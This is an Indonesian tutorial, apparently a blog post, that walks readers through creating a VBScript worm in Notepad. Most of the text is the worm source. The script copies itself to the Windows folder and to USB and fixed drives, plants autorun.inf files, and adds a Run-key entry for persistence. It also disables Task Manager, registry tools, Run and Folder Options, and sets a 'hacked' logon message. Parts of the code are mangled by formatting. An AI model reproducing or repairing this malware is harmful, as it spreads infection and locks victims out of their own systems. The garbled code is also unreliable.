Membuat Virus VBS II [OPEN SKRIPT]

Setiap virus memiliki karakter masing - masing, karakter tersebut bisa dibedakan dari cara menyerang maupun ekstensi virus tersebut. Kali ini saya akan membahas virus berekstensi VBS yang menggunakan Windows Script Host. Skript tersebut dapat dibuat dengan aplikasi sederhana, yaitu Notepad. Berikut cara pembuatannya:

1. Buka Notepad

2. Copy dan Paste skript Berikut:

-------------------------------------------------------Skript----------------------------------------------------
on error resume next

dim rekur,windowpath,flashdrive,fs,mf,isi,tf,Hx,nt,che ck,sd

isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs” set fs = createobject(”Scripting.FileSystemObject”) set mf = fs.getfile(Wscript.ScriptFullname) dim text,size size = mf.size check = mf.drive.drivetype set text = mf.openastextstream(1,-2) do while not text.atendofstream rekur = rekur & text.readline rekur = rekur & vbcrlf loop do

Set windowpath = fs.getspecialfolder(0) set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “) tf.attributes = 32 set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true) tf.write rekursif tf.close set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “) tf.attributes = 39

for each flashdrive in fs.drives If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “) tf.attributes =32 set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true) tf.write rekursif tf.close set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “) tf.attributes = 39

set tf =fs.getfile(flashdrive.path &”\autorun.inf”) tf.attributes = 32 set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true) tf.write isi tf.close set tf = fs.getfile(flashdrive.path &”\autorun.inf”) tf.attributes=39 end if next

set Hx = createobject(”WScript.Shell”)

Hx.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” HxHacker “

Hx.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”

Hx.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD” Hx.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD” Hx.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD” Hx.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD” Hx.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

Hx.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

Hx.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Winlogon\LegalNoticeCaption”, “Worm Hx . your computer now is hacked by zeke hack.”

Hx.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “

Hx.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix” Hx.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Hx ”

if check <> 1 then Wscript.sleep 200000 end if loop while check <> 1 set sd = createobject(”Wscript.shell”) sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname

-----------------------------------------------akhir skript---------------------------------------------------

3. Save as, ubah save as type menjadi "all files", simpan dengan format ".vbs", misal Hx.vbs.

____________________________________________________________________

--------------------------Gunakanlah Tutorial Dengan Bijak---------------------------